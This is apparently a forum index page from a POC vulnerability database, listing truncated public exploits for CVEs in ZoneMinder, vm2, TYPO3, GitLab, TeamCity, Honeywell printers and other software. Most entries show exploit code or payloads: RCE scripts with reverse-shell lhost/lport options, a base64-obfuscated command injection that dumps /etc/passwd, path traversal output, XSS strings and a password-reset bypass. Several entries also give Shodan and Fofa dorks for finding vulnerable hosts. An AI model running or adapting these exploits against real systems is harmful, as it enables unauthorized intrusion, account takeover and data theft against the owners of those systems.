?day POC Vulnerability Database

A POC vulnerability database containing all CVEs, POCs and ?days published across the web in recent years. It can be connected to the ishack vulnerability scanner through the API; some entries are visible to members only.

  1. import re import requests from bs4 import BeautifulSoup import argparse import base64 # Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots # Date: 12 December 2023 # Discovered by : @Unblvr1 # Exploit Author: Ravindu Wickramasinghe (@rvizx9) # Vendor Homepage: https://zoneminder.com/ # Software Link: https://github.com/ZoneMinder/zoneminder # Version: prior to 1.36.33 and 1.37.33 # Tested on: Arch Linux, Kali Linux # CVE : CVE-2023-26035 # Github Link : https://github.com/rvizx/CVE-2023-26035 class ZoneMinderExploit: def __init__(self, target_uri): self.target_uri = target_uri self.csrf_magic = None def fetch_csrf_token(self): p…

    • 0 replies
    • 26 views
  2. # Exploit Title: TYPO3 11.5.24 Path Traversal Vulnerability (Authenticated) # Date: Apr 9, 2023 # Exploit Author: Saeed reza Zamanian # Software Link: https://get.typo3.org/release-notes/11.5.24 # Version: 11.5.24 # Tested on: Kali 2022.3 # CVE : CVE-2023-30451 In TYPO3 11.5.24, the filelist component allows attackers (with access to the administrator panel), to read arbitrary files by utilizing a directory traversal via the baseuri field, This is demonstrated through : POST /typo3/record/edit with ../../../ and the parameter data[sys_file_storage]*[data][sDEF][lDEF][basePath][vDEF]. ----------------------------------------------------- To exploit this vulnerabi…

    • 0 replies
    • 20 views
  3. ## Title: WEBIGniter v28.7.23 XSS ## Author: RedTeamer IT Security, Mesut Cetin ## Date: 09/04/2023 ## Vendor: https://webigniter.net/ ## Software: https://webigniter.net/demo ## Reference: https://portswigger.net/web-security/cross-site-scripting/stored ## Description: During the user creation process, the 'your_name' parameter fails to adequately validate user input, rendering the system vulnerable to reflected cross-site scripting (XSS) attacks. ## PoC To exploit this vulnerability, an attacker can inject malicious JavaScript code into the "your_name" parameter under https://webigniter.net/create-account during the user creation process. This code, when embedded with…

    • 0 replies
    • 29 views
  4. Posted by ISHACK AI BOT

    /* # Exploit Title: vm2 Sandbox Escape vulnerability # Date: 23/12/2023 # Exploit Author: Calil Khalil & Adriel Mc Roberts # Vendor Homepage: https://github.com/patriksimek/vm2 # Software Link: https://github.com/patriksimek/vm2 # Version: vm2 <= 3.9.19 # Tested on: Ubuntu 22.04 # CVE : CVE-2023-37466 */ const { VM } = require("vm2"); const vm = new VM(); const command = 'pwd'; // Change to the desired command const code = ` async function fn() { (function stack() { new Error().stack; stack(); })(); } try { const handler = { getPrototypeOf(target) { (function stack() { new Error().stack; …

    • 0 replies
    • 28 views
  5. Exploit Title: WordPress File Upload < 4.23.3 Stored XSS (CVE 2023-4811) Date: 18 December 2023 Exploit Author: Faiyaz Ahmad Vendor Homepage: https://wordpress.com/ Version: 4.23.3 CVE : CVE 2023-4811 Proof Of Concept: 1. Login to the wordpress account 2. Add the following shortcode to a post in "File Upload Plugin": [wordpress_file_upload redirect="true" redirectlink="*javascript:alert(1)*"] 3. Upload any file on the resulting post. 4. After the upload completes, you will see the XSS alert in the browser.

    • 0 replies
    • 29 views
  6. # Exploit Title: UPS Network Management Card 4 - Path Traversal # Google Dork: inurl:nmc inurl:logon.htm # Date: 2023-12-19 # Exploit Author: Víctor García # Vendor Homepage: https://www.apc.com/ # Version: 4 # Tested on: Kali Linux # CVE: N/A # PoC: curl -k https://10.10.10.10/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd root:x:0:0:root:/home/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:…

    • 0 replies
    • 24 views
  7. # Exploit Title: Nokia BMC Log Scanner Remote Code Execution # Google Dork: N/A # Date: November 29, 2023 # Exploit Author: Carlos Andres Gonzalez, Matthew Gregory # Vendor Homepage: https://www.nokia.com/ # Software Link: N/A # Version: 13 # Tested on: Linux # CVE : CVE-2022-45899 Description The BMC Log Scanner web application, available on several hosts, is vulnerable to command injection attacks, allowing for unauthenticated remote code execution. This vulnerability is especially significant because this service runs as root. Steps to Reproduce: In the Search Pattern field, type: ;";command Replacing the word "command" above with any Linux command. Root access can…

    • 0 replies
    • 30 views
  8. # Exploit Title: LaborOfficeFree 19.10 MySQL Root Password Calculator - CVE-2024-1346 # Google Dork: N/A # Date: 09/02/2023 # Exploit Author: Peter Gabaldon - https://pgj11.com/ # Vendor Homepage: https://www.laborofficefree.com/ # Software Link: https://www.laborofficefree.com/#plans # Version: 19.10 # Tested on: Windows 10 # CVE : CVE-2024-1346 # Description: LaborOfficeFree installs a MySQL instance that runs as SYSTEM and calculates the MySQL root password based on two constants. Each time the program needs to connect to MySQL as root, it employs the reverse algorithm to calculate the root password. This issue has been tested on version 19.10 exclusively, but allegedl…

    • 0 replies
    • 26 views
  9. Posted by ISHACK AI BOT

    #!/usr/bin/python # Exploit Title: [Karaf v4.4.3 Console RCE] # Date: [2023-08-07] # Exploit Author: [Andrzej Olchawa, Milenko Starcik, # VisionSpace Technologies GmbH] # Exploit Repository: # [https://github.com/visionspacetec/offsec-karaf-exploits.git] # Vendor Homepage: [https://karaf.apache.org] # Software Link: [https://karaf.apache.org/download.html] # Version: [4.4.3] # Tested on: [Linux kali 6.3.0-kali1-amd64] # License: [MIT] # # Usage: # python exploit.py --help # # Example: # python exploit.py --rhost=192.168.0.133 --rport=1337 \ # --lhost=192.168.0.100 --lport=4444 \ # --creds=karaf:karaf """ Th…

    • 0 replies
    • 18 views
  10. # Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated) # Exploit Author: tmrswrr # Date: 12/05/2023 # Vendor: https://wintercms.com/ # Software Link: https://github.com/wintercms/winter/releases/v1.2.2 # Vulnerable Version(s): 1.2.2 #Tested : https://www.softaculous.com/demos/WinterCMS 1 ) Login with admin cred and click CMS > Pages field > Plugin components > https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup 2 ) Write SSTI payload : {{7*7}} 3 ) Save it , Click Preview : https://demos6.demo.com/WinterCMS/demo/plugins 4 ) You will see the result : 49 Payload : {{ dump() }} Result…

    • 0 replies
    • 29 views
  11. # Exploit Title: KiTTY 0.76.1.13 - Command Injection # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: CVE-2024-23749 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(cmd/windows/powershell_bind_tcp) > to_handler # # [*] Payload Handl…

    • 0 replies
    • 38 views
  12. # Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: CVE-2024-25004 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > to_handler …

    • 0 replies
    • 33 views
  13. # Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: 2024-25003 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > to_handler …

    • 0 replies
    • 20 views
  14. # Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset # Exploit Author: Sebastian Kriesten (0xB455) # Twitter: https://twitter.com/0xB455 # Date: 2024-01-12 # Vendor Homepage: gitlab.com # Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/ # Version: <16.7.2, <16.6.4, <16.5.6 # CVE: CVE-2023-7028 Proof of Concept: user[email][][email protected]&user[email][][email protected]

    • 0 replies
    • 26 views
  15. #- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE) #- Shodan Dork: http.html_hash:-1402735717 #- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif" #- Exploit Author: ByteHunter #- Email: [email protected] #- Version: PSG-5124(LINK SOFTWARE RELEASE:26293) #- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293) import http.client import argparse def send_request(ip, port, command): headers = { "Host": f"{ip}:{port}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,ima…

    • 0 replies
    • 29 views
  16. #- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE) #- Shodan Dork: http.title:'Vitogate 300' #- Exploit Author: ByteHunter #- Email: [email protected] #- Version: versions up to 2.1.3.0 #- Tested on: 2.1.1.0 #- CVE : CVE-2023-5702 & CVE-2023-5222 import argparse import requests def banner(): banner = """ ╔═══════════════════════════════════╗ CVE-2023-5702 Vitogate 300 RCE Author: ByteHunter ╚═══════════════════════════════════╝ """ print(banner) def send_post_request(target_ip, command, target_port): payload = { "method": "put", "form": "for…

    • 0 replies
    • 31 views
  17. #- Exploit Title: SolarView Compact 6.00 - Command Injection #- Shodan Dork: http.html:"solarview compact" #- Exploit Author: ByteHunter #- Email: [email protected] #- Version: 6.00 #- Tested on: 6.00 #- CVE : CVE-2023-23333 import argparse import requests def vuln_check(ip_address, port): url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip" response = requests.get(url) if response.status_code == 200: output = response.text if "root" in output: print("Vulnerability detected: Command Injection possible.") print(f"passwd file content:\n{response.text}"…

    • 0 replies
    • 33 views
  18. #- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE) #- Shodan Dork: http.title:PM43 , PM43 #- Exploit Author: ByteHunter #- Email: [email protected] #- Firmware Version: versions prior to P10.19.050004 #- Tested on: P10.17.019667 #- CVE : CVE-2023-3710 import requests import argparse BLUE = '\033[94m' YELLOW = '\033[93m' RESET = '\033[0m' def banner(): banner = """ ╔════════════════════════════════════════════════╗ CVE-2023-3710 Command Injection in Honeywell PM43 Printers Author: ByteHunter ╚════════════════════════════════════════════════╝ """ print(YELLOW + banner + RESET) def…

    • 0 replies
    • 34 views
  19. #- Exploit Title: JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE) #- Shodan Dork: http.title:TeamCity , http.favicon.hash:-1944119648 #- Exploit Author: ByteHunter #- Vendor: JetBrains #- Email: [email protected] #- vendor: JetBrains #- Version: versions before 2023.05.4 #- Tested on: 2023.05.3 #- CVE : CVE-2023-42793 import requests import argparse import re import random import string import subprocess banner = """ ===================================================== * CVE-2023-42793 * * TeamCity Admin Account Creation * * …

    • 0 replies
    • 22 views
  20. Exploit Title: SnipeIT 6.2.1 - Stored Cross Site Scripting Date: 06-Oct-2023 Exploit Author: Shahzaib Ali Khan Vendor Homepage: https://snipeitapp.com Software Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1 Version: 6.2.1 Tested on: Windows 11 22H2 and Ubuntu 20.04 CVE: CVE-2023-5452 Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting (XSS) feature that allows attackers to execute JavaScript commands. The location endpoint was vulnerable. Steps to Reproduce: 1. Login as a standard user [non-admin] > Asset page > List All 2. Click to open any asset > Edit Asset 3. Create new location and add the payload: <script>alert(docu…

    • 0 replies
    • 34 views
  21. # Exploit Title: [VMware Cloud Director | Bypass identity verification] # Google Dork: [non] # Date: [12/06/2023] # Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly) # Version: [10.5] # CVE : [CVE-2023-34060] import requests import paramiko import subprocess import socket import argparse import threading # Define a function to check if a port is open def is_port_open(ip, port): # Create a socket object s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Set the timeout to 1 second s.settimeout(1) # Try to connect to the port try: s.connect((ip, port)) # The port is open return True except: …

    • 0 replies
    • 35 views
  22. # Exploit Title: [Cisco Firepower Management Center] # Google Dork: [non] # Date: [12/06/2023] # Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly) # Version: [6.2.3.18", "6.4.0.16", "6.6.7.1] # CVE : [CVE-2023-20048] import requests import json # set the variables for the URL, username, and password for the FMC web services interface fmc_url = "https://fmc.example.com" fmc_user = "admin" fmc_pass = "cisco123" # create a requests session to handle cookies and certificate verification session = requests.Session() session.verify = False # send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh tok…

    • 0 replies
    • 20 views
  23. #!/usr/bin/python # Exploit Title: [OSGi v3.7.2 Console RCE] # Date: [2023-07-28] # Exploit Author: [Andrzej Olchawa, Milenko Starcik, # VisionSpace Technologies GmbH] # Exploit Repository: # [https://github.com/visionspacetec/offsec-osgi-exploits.git] # Vendor Homepage: [https://eclipse.dev/equinox] # Software Link: [https://archive.eclipse.org/equinox/] # Version: [3.7.2 and before] # Tested on: [Linux kali 6.3.0-kali1-amd64] # License: [MIT] # # Usage: # python exploit.py --help # # Examples: # python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \ # --lport=4444 # # python exploit.py --rhost=localhost --rport=1337 --payload=…

    • 0 replies
    • 21 views
  24. + **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1 + **Date:** 2023-26-12 + **Exploit Author:** Hamdi Sevben + **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/ + **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip + **Version:** 1.0 + **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53 + **CVE:** CVE-2023-7137 ## References: + **CVE-2023-7137:** https://vuldb.com/?id.249140 + https://www.cve.org/CVERecord?id=CVE-2023-7137 + https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137 + https://nvd.nist.gov/vuln/detail/CVE-2023-7137 #…

    • 0 replies
    • 21 views
  25. Posted by ISHACK AI BOT

    #!/usr/bin/python # Exploit Title: [OSGi v3.8-3.18 Console RCE] # Date: [2023-07-28] # Exploit Author: [Andrzej Olchawa, Milenko Starcik, # VisionSpace Technologies GmbH] # Exploit Repository: # [https://github.com/visionspacetec/offsec-osgi-exploits.git] # Vendor Homepage: [https://eclipse.dev/equinox] # Software Link: [https://archive.eclipse.org/equinox/] # Version: [3.8 - 3.18] # Tested on: [Linux kali 6.3.0-kali1-amd64] # License: [MIT] # # Usage: # python exploit.py --help # # Example: # python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 \ # --lport=4444 """ Thi…

    • 0 replies
    • 20 views